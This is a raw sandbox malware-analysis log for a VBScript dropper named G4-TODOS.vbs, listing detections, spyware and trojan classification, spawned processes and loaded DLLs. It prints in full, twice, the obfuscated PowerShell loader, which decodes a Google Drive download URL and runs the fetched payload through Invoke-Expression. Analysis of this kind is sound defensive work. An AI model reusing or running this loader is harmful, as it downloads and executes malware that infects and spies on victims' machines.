            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C3EB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021CEF88
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C4200
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F1C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F25D3
            Source: G4-TODOS.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_4632.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_2080.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 4632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/8@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Coleoptilum.Unw
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbn2mgjy.gfg.ps1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: (=u22_2_005F1C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: WABOpen22_2_005F1C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: 5_22_2_005F3530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4632
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2080
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknown; Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: C:\Windows\System32\wscript.exe; Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe; Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: actxprxy.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.staterepositoryps.dllJump to behavior
